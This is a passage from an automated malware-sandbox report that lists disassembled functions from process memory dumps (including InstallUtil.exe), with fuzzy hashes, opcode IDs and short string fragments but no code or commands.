Instruction Fuzzy Hash: E1E0EC38949208EBCB44DBD8E9455ADBBB4EB45314F1491DD980817341CA315E42DB85

Function 060C66D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1948512990.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction ID: 324916237309632087ceed8e71ba80fe2014e104a6e65747591dcdb83cb99af8
Opcode Fuzzy Hash: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction Fuzzy Hash: 70E0EC38949208EBCB54DF98E9455ADBBB4EB45314F10919D980817341CA329E42DB85

Function 060C6CE8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1948512990.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction ID: 2f45d8557bf5d2f157c6f078f304a548ab7a4e2dc83e2116f2c52ae4c364bd6f
Opcode Fuzzy Hash: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction Fuzzy Hash: 5AE08C34D09208EBC754DF98E9455ADFFB8EB85310F20809CD80813340CB325E42CB80

Function 060C0F60 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1948512990.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction ID: 23d21ce26eece5982d94c3fc2846bfb9df991cc4c133994874944b7450bc759c
Opcode Fuzzy Hash: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction Fuzzy Hash: 6BE08C34988208EFCB44DB98E8446ADBBB4EB85310F10809C980913340CA325E82CB85

Function 060C77B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1948512990.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction ID: 994bb4db93ced2a51ace008600095a2eaa78478acad50b4497beb703b0a3481e
Opcode Fuzzy Hash: 1eae426ba6047bc5c0c7c4df2fdc2bc31a8db8b96a84b57b1057be0f518ecf79
Instruction Fuzzy Hash: 73E0EC34949208EBCB44DBA8E9455ADBBB4EB49315F10919D980817341DA315E42DF85

Function 075CB620 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1950335910.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_75b0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac2b9494f9d25d9762fbbedd335e7fb93496dd4e5c1791b057bb3d0f9d85be1
Instruction ID: 3d3f588a942a21138a0a6aa6f781d755aa197e7da2d9e6a683980a643e45a069
Opcode Fuzzy Hash: fac2b9494f9d25d9762fbbedd335e7fb93496dd4e5c1791b057bb3d0f9d85be1
Instruction Fuzzy Hash: 39E05BB154120DEFC741FFF9D90469FF7F9EB45210F0055A9D405D7150ED325A409BA6

Function 075CE280 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1950335910.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_75b0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8895102e7df0fb8b9dc3f4cd581eb2f86f2ab8f966defc2cf0dc22ee32b47dde
Instruction ID: a6ddc7a497aef415fb5006329e89caacc20874d423124314f473dc6c98cddd81
Opcode Fuzzy Hash: 8895102e7df0fb8b9dc3f4cd581eb2f86f2ab8f966defc2cf0dc22ee32b47dde
Instruction Fuzzy Hash: 40E08CB4908208EFC704DFD8E8456ADBBB4EB46300F10A09D980813340CA325E02DB80

Function 060C5286 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1948512990.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7be9b0490d17c6a799a7ad3a1179194c154c33af6a192c990ac3391f562593d0
Instruction ID: 133236f522b864aa7de8064e0c8f717e3f44de06cc61c9886624c0e33548badb
Opcode Fuzzy Hash: 7be9b0490d17c6a799a7ad3a1179194c154c33af6a192c990ac3391f562593d0
Instruction Fuzzy Hash: DFE04F7490411D8FDB65CF14C814BAFBBB5FB49300F1041A9A519E3785DB354E80DF50

Function 015C0950 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1927339067.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_15c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3495df5d57d77cd042551525b98dccab0920181b2a22488b554fdfbaf33ad69d
Instruction ID: e1b3a992b1d567ac9c4c01a1bfe75d8e62c08aada1c784b1b168193b3fcafe73
Opcode Fuzzy Hash: 3495df5d57d77cd042551525b98dccab0920181b2a22488b554fdfbaf33ad69d
Instruction Fuzzy Hash: 8ED01730A4010DEF8B00FFA8EA0555EBBB9EB48200B2041A99408E7204EB316E049B81

Function 060C37B0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1948512990.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4a0f79732103e655e6dbc5892a82edfb1b07083e0ce932b2139d3d2e256134
Instruction ID: 1be4cccf6535780dbf205ed16b4463f24ebb00ec78b69ed08cbfd0239816f07e
Opcode Fuzzy Hash: 6a4a0f79732103e655e6dbc5892a82edfb1b07083e0ce932b2139d3d2e256134
Instruction Fuzzy Hash: 5DE0BD388102288FCB60DF21D948BDDBBB1AB05300F1040AA9809632A0C7385BC4CF00

Function 015CCFD0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1927339067.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_15c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b9a344bb32121137f55f41c0f4f680480800fdb0dc4f3cfe38e4e224695d15
Instruction ID: 627c441a0df9da88a389a70f1866435aa78c605442181787569b495f653ebac7
Opcode Fuzzy Hash: e5b9a344bb32121137f55f41c0f4f680480800fdb0dc4f3cfe38e4e224695d15
Instruction Fuzzy Hash: DDC02B3004A30A8FD2942BDE7C0C7777ADCF303725F00B80C760C804128E705840CB54

Function 015CD028 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1927339067.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_15c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b607ff5a045a6facedd5a95e22678c1799d48e46764bc9f196da0cef582a210
Instruction ID: 5eeaab75359328a95480eeb8c5a0c2e7ef5793cc29514fd1c7f40aa89f114af6
Opcode Fuzzy Hash: 7b607ff5a045a6facedd5a95e22678c1799d48e46764bc9f196da0cef582a210
Instruction Fuzzy Hash: 0DC08C300047048BE2947FEDFC0C3ADBBA8EB02312F086028F60DA08609FB00040CB7A

Function 015C0841 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1927339067.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_15c0000_Id.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e6eabc95ef5e5ad9e0c6193cf8622c1ef4c6c50403c814207c742befb047dc
Instruction ID: 0b865c4af98eb08d7eab58ecdc870ad483341ec0f1ad2ae4c5a63cbf1e7f265f
Opcode Fuzzy Hash: d3e6eabc95ef5e5ad9e0c6193cf8622c1ef4c6c50403c814207c742befb047dc
Instruction Fuzzy Hash: FCC0923180E7E92FC30352600C610843BE5AC9726038F42C388A08FA62D1690A868B23

Analysis Process: InstallUtil.exePID: 4192, Parent PID: 2580COMMON

Executed Functions

Function 017DB328 Relevance: 6.6, Strings: 5, Instructions: 354COMMON

Download Yara Rule

Strings

LjAp, xrefs: 017DB6E5
LjAp, xrefs: 017DB6CF
PH^q, xrefs: 017DB747
0oAp, xrefs: 017DB562
PH^q, xrefs: 017DB758

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6fdfadf8326eb04ac654f80ff96332835ab9b376e38c04c2bbac003606aa9e93
Instruction ID: d24fc8d3100b3dc8083e5a2c3ba3a91f64a43e5a07031fa27439d0e97b2ac79e
Opcode Fuzzy Hash: 6fdfadf8326eb04ac654f80ff96332835ab9b376e38c04c2bbac003606aa9e93
Instruction Fuzzy Hash: A8E1D875A00219DFDB14DFA9C984A9DFBB2FF49310F1680A9E919AB361DB31E841CF50

Function 017DC752 Relevance: 6.4, Strings: 5, Instructions: 191COMMON

Download Yara Rule

Strings

PH^q, xrefs: 017DC9A7
LjAp, xrefs: 017DC92F
0oAp, xrefs: 017DC7C2
LjAp, xrefs: 017DC945
PH^q, xrefs: 017DC9B8

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 28186d9d7c5233ba4d6014c932caee2439c9e5c645d2d7f4fa16bfb169ae0428
Instruction ID: 72d18ff764899775c9d202ea1eaa4bb8b00235eb6cca75847594d0c78a17c3b1
Opcode Fuzzy Hash: 28186d9d7c5233ba4d6014c932caee2439c9e5c645d2d7f4fa16bfb169ae0428
Instruction Fuzzy Hash: 4181AF74E00218DFDB15DFAAD984A9DFBF2BF88310F148069E409AB365DB349981CF10

Function 017DBEB0 Relevance: 6.4, Strings: 5, Instructions: 190COMMON

Download Yara Rule

Strings

PH^q, xrefs: 017DC118
LjAp, xrefs: 017DC08F
PH^q, xrefs: 017DC107
LjAp, xrefs: 017DC0A5
0oAp, xrefs: 017DBF22

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 5e63320307bb886ab655f32c9b820c4f589b75d8347850faaa7c731e50794c58
Instruction ID: 6b4106ea8409062789fa211428d47d28a2703a4181a8f29b69354ea2ae77690a
Opcode Fuzzy Hash: 5e63320307bb886ab655f32c9b820c4f589b75d8347850faaa7c731e50794c58
Instruction Fuzzy Hash: 1C81C574E00218CFDB15DFAAD984A9DFBF2BF89300F1480A9E409AB365DB359981CF51

Function 017DC190 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

PH^q, xrefs: 017DC3F8
LjAp, xrefs: 017DC36F
LjAp, xrefs: 017DC385
PH^q, xrefs: 017DC3E7
0oAp, xrefs: 017DC202

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: e35bd2396138cabc8f59be14d7b3a11f6d137a7c12455d902c13c33102ca84ab
Instruction ID: 5bc9e83db80988cf3602216e3b22a969bbe6358a17787a85dd2e9d86b618a2b4
Opcode Fuzzy Hash: e35bd2396138cabc8f59be14d7b3a11f6d137a7c12455d902c13c33102ca84ab
Instruction Fuzzy Hash: 51819174E00218DFDB15DFAAD984A9DFBF2BF89300F14806AE419AB365DB349981CF51

Function 017DCA32 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

LjAp, xrefs: 017DCC0F
PH^q, xrefs: 017DCC87
LjAp, xrefs: 017DCC25
PH^q, xrefs: 017DCC98
0oAp, xrefs: 017DCAA2

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a933e1c36e854d6d0ae619fd8293a20de2914624af8fc66cac451745583fd048
Instruction ID: 1cb856aa7c70ff4aa44fbdf9d0939e1bcd3f3055b808a99a36127d82144ecd7a
Opcode Fuzzy Hash: a933e1c36e854d6d0ae619fd8293a20de2914624af8fc66cac451745583fd048
Instruction Fuzzy Hash: B6818F74E00218DFDB15DFAAD984A9DFBF2BF88300F14D069E919AB265DB349981CF11

Function 017D4AD9 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

LjAp, xrefs: 017D4CCE
PH^q, xrefs: 017D4D41
0oAp, xrefs: 017D4B4A
PH^q, xrefs: 017D4D30
LjAp, xrefs: 017D4CB8

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: e1d0de9f2c156621241eccc25b6aaf665a6a4de8cda866c8aa3b8dbb1b391a91
Instruction ID: 2723626714d2cb7c446855aaf79e3434dbbe67b0e7d4ef125d1e84761f6f75a4
Opcode Fuzzy Hash: e1d0de9f2c156621241eccc25b6aaf665a6a4de8cda866c8aa3b8dbb1b391a91
Instruction Fuzzy Hash: B7819F74E00218DFDB54DFAAD984A9DFBF2BF88300F14C069E819AB265DB359981CF10

Function 017DC470 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

0oAp, xrefs: 017DC4E2
LjAp, xrefs: 017DC665
PH^q, xrefs: 017DC6C7
PH^q, xrefs: 017DC6D8
LjAp, xrefs: 017DC64F

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: ac0235090a6fdc857cd184a3c57828b5ca0bc621866168fa73a9043bab255122
Instruction ID: 6b8fe419c45d5daf4074e5eedac5eeda2fe02249698372d2872dff053f3197e3
Opcode Fuzzy Hash: ac0235090a6fdc857cd184a3c57828b5ca0bc621866168fa73a9043bab255122
Instruction Fuzzy Hash: 11819274E00218DFDB15DFAAD984A9DFBF2BF88300F24D069E419AB265DB349981CF50

Function 017DBBD2 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

PH^q, xrefs: 017DBE27
LjAp, xrefs: 017DBDAF
0oAp, xrefs: 017DBC42
PH^q, xrefs: 017DBE38
LjAp, xrefs: 017DBDC5

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 5410fb1630009522ebff3294cce22a3a9bac826010e99a7d1f0f46204891ce26
Instruction ID: 61311cabe66f562e18bd77ba3920c2ad30f4858992f8604a6b7bb5038fa50f9a
Opcode Fuzzy Hash: 5410fb1630009522ebff3294cce22a3a9bac826010e99a7d1f0f46204891ce26
Instruction Fuzzy Hash: E0819074E00218DFDB14DFAAD984A9DFBF2BF89300F1580A9E409AB365DB349985CF51

Function 017D9540 Relevance: 6.1, Strings: 4, Instructions: 1127COMMON

Download Yara Rule

Strings

(o^q, xrefs: 017D9C78
4'^q, xrefs: 017DA273
4'^q, xrefs: 017D966C
4'^q, xrefs: 017D9564

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (o^q$4'^q$4'^q$4'^q
API String ID: 0-183542557
Opcode ID: cc1e67cf7c3855514f0647e267175350aa9f16b0f7b648eede23552dc0b4fcca
Instruction ID: 412119b497995b252efcff93c6a99edb9a90b5bfbd139d790277f199f124d815
Opcode Fuzzy Hash: cc1e67cf7c3855514f0647e267175350aa9f16b0f7b648eede23552dc0b4fcca
Instruction Fuzzy Hash: 09A29F75A00209DFCB15CF68C984AAEFBF2FF88304F158569E905DB2A6D735E981CB50

Function 017D6880 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

(o^q, xrefs: 017D697A
(o^q, xrefs: 017D6988
,bq, xrefs: 017D6A00
,bq, xrefs: 017D69F2

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 907f65cd50cfe60106fc1f2ff7e1face5752a7dafc60876e11819743df23d1e5
Instruction ID: e2bb66ae379b4f53563a41843de0dd99acf44e145e95f6a9572ff23b7e184f85
Opcode Fuzzy Hash: 907f65cd50cfe60106fc1f2ff7e1face5752a7dafc60876e11819743df23d1e5
Instruction Fuzzy Hash: DFD13974A00219DFDB15CFA9C988AADFBF2FF88304F258069F545AB2A5D730E941CB50

Function 017DB4F2 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

PH^q, xrefs: 017DB747
0oAp, xrefs: 017DB562
PH^q, xrefs: 017DB758

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$PH^q$PH^q
API String ID: 0-4194141968
Opcode ID: 0f3d84dd08ed28a3c72a1eb61d8c9993d5d2efaea22f73bc22487df990788437
Instruction ID: dcf04cb69baced149d1752891323b8815d2922b80faa3ca6d6692794d21e27a3
Opcode Fuzzy Hash: 0f3d84dd08ed28a3c72a1eb61d8c9993d5d2efaea22f73bc22487df990788437
Instruction Fuzzy Hash: EA619174E006089FDB18DFAAD984A9DFBF2BF89310F15C06AE419AB365DB349941CF50

Function 017D6108 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

Hbq, xrefs: 017D650E
(o^q, xrefs: 017D6642

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 27537bcc9a6f4f74ba0e6855a03f55d79c9ca6d3a985cb3e35bbe632fdba66e0
Instruction ID: 93320e12d11cf2922b8faf63654577f8e32e9c35461ba81d9383600a4154b087
Opcode Fuzzy Hash: 27537bcc9a6f4f74ba0e6855a03f55d79c9ca6d3a985cb3e35bbe632fdba66e0
Instruction Fuzzy Hash: C4129B70A002198FDB14DFA9C944AAEBBF6BF88300F148569E50ADB391EB34DD45CB90

Function 06B48BF2 Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06B48EAB
PH^q, xrefs: 06B48E9A

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 39bdbdac65d2236ba9577d845bd5cf6080a20c39c1314f4492c37155672853e6
Instruction ID: 757f72baca766fc921309a8c55d62562ae91da7cd1332ae0a131af9c5711821b
Opcode Fuzzy Hash: 39bdbdac65d2236ba9577d845bd5cf6080a20c39c1314f4492c37155672853e6
Instruction Fuzzy Hash: 9F9104B0E04218CFDB68DFA9C994BADBBF2BF89300F14806AD449AB355DB349945CF50

Function 017DF007 Relevance: .7, Instructions: 717COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529f1c63439812687e3bfd9a26685a57db79869ac444d61a932151cfb60f0d06
Instruction ID: 86ab1288e086d290aee3099df8e7e91346b12293229636aa9b01b098f4b45871
Opcode Fuzzy Hash: 529f1c63439812687e3bfd9a26685a57db79869ac444d61a932151cfb60f0d06
Instruction Fuzzy Hash: B972AD74E012298FDB65DF69C984BD9FBB2BB49300F1491E9E409A7251EB349EC2CF50

Function 06B48608 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f0ce580bc65bdf447ea6fd8d62b2796c8c1dc142d25c5d80349bdf641cefb8
Instruction ID: f33e5f030c2f6338818c041f9a06f9e6d26805729c0891198e811ed02f0170c8
Opcode Fuzzy Hash: 38f0ce580bc65bdf447ea6fd8d62b2796c8c1dc142d25c5d80349bdf641cefb8
Instruction Fuzzy Hash: 39E1B174E01218CFDB54DFA9C944B9DBBB2FF89304F2081A9D418A7394DB759A85CF50

Function 06B4B6E8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d241a7c0a55fa4393e4d329087c4e6de776466f9202def686789777f7e55231d
Instruction ID: 9b6085647e8233fd802aa9ec5739ec17549c3d3af41cb8a81f924654ddac5d6d
Opcode Fuzzy Hash: d241a7c0a55fa4393e4d329087c4e6de776466f9202def686789777f7e55231d
Instruction Fuzzy Hash: B6A1A5B4E012188FEB54DF6AC944B9DBBF2AF89300F14D0E9D50CA7255DB349A85CF51

Function 06B4D670 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba0c2f0d4ce31bffc156bf79f49d7ecc0db1ee6e84b977ebef67bc7372294336
Instruction ID: bccfde8d4b90d6a3125acd2036b36d300c7194ba6ffaf169e611356a16c9c85a
Opcode Fuzzy Hash: ba0c2f0d4ce31bffc156bf79f49d7ecc0db1ee6e84b977ebef67bc7372294336
Instruction Fuzzy Hash: 8EA1B2B0E012188FEB68DF6AC944B9DBBF2AF89300F14D0EAD40DA7255DB345A85CF50

Function 06B4C388 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd453c3c1c3408368960af69404f0d605db9b5dd0cf9b15fca7a962f068602a
Instruction ID: ed06c4ea0663e777df65e43f41ddb22064b8347c884c09f983ae9a80371266d0
Opcode Fuzzy Hash: 9bd453c3c1c3408368960af69404f0d605db9b5dd0cf9b15fca7a962f068602a
Instruction Fuzzy Hash: E6A1B2B4E012288FEB64DF6AC944B9DBAF2AF89300F14D0EAD50DA7255DB305A85CF50

Function 06B4AA58 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6cff059aada9d555fd0598611bcb247b8939282d3834a83fdeefbc931147f2
Instruction ID: a54e740e3abed303c57660c3786d9a72d8ca8f73476bb11d1dfb1e6bea3d3401
Opcode Fuzzy Hash: 3c6cff059aada9d555fd0598611bcb247b8939282d3834a83fdeefbc931147f2
Instruction Fuzzy Hash: 92A193B4E012188FEB68DF6AC944B9DFBF2AF89300F14D0AAD409A7255DB345A85CF51

Function 06B4AA48 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc6b0c8dc17adc2911bd3c2949b476a7cb7ce67694cee6226c68c9489123147
Instruction ID: 414016723044ccc13a33d1c22c69bcfb856ca7220e4aa997e001a2c77ace247f
Opcode Fuzzy Hash: 8bc6b0c8dc17adc2911bd3c2949b476a7cb7ce67694cee6226c68c9489123147
Instruction Fuzzy Hash: 567195B1E016188FEB68DF6AC944B99FBF2AF89200F14C0AAD50DA7254DB345A85CF51

Function 06B4C378 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab10f89682888884675e649a27a54fc26e44e7c1c7666aa289c21fe6788d06e
Instruction ID: 2976d717989afb88325d76b9f991ce8e7455ebcf6e583489521e26ad3b2da10a
Opcode Fuzzy Hash: cab10f89682888884675e649a27a54fc26e44e7c1c7666aa289c21fe6788d06e
Instruction Fuzzy Hash: AB4188B1E016189FEB58CF6BCD557CAFAF3AFC9204F04C0AAD50CA6255DB740A868F51

Function 06B48602 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
